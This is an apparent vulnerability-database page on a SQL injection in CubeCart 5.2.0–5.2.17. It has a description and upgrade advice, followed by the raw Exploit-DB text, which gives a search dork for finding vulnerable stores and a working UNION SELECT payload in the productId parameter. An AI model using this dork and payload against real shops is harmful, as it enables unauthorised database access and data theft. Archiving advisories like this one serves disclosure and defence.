CubeCart (index.php) Sql Injection Vulnerability

vendor:

CubeCart

by:

AtT4CKxT3rR0r1ST

CVSS

HIGH

Sql Injection

CWE

Product Name: CubeCart

Affected Version From: 5.2.0

Affected Version To: 5.2.17

Patch Exists: YES

Related CWE: N/A

CPE: a:cubecart:cubecart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

CubeCart (index.php) Sql Injection Vulnerability

CubeCart is vulnerable to a SQL injection vulnerability in the index.php file. This vulnerability allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to the lack of proper sanitization of user-supplied input in the "productId" parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.

Mitigation:

Upgrade to the latest version of CubeCart.

Source

Exploit-DB raw data:

CubeCart (index.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : http://www.cubecart.com/downloads/
.:. Dork           : "powered by CubeCart" inurl:"index.php?_a="

####################################################################

===[ Exploit ]===

www.site.com/index.php?_a=viewProd&productId=22[Sql  Sql Injection]

===[ Example ]===

http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()

####################################################################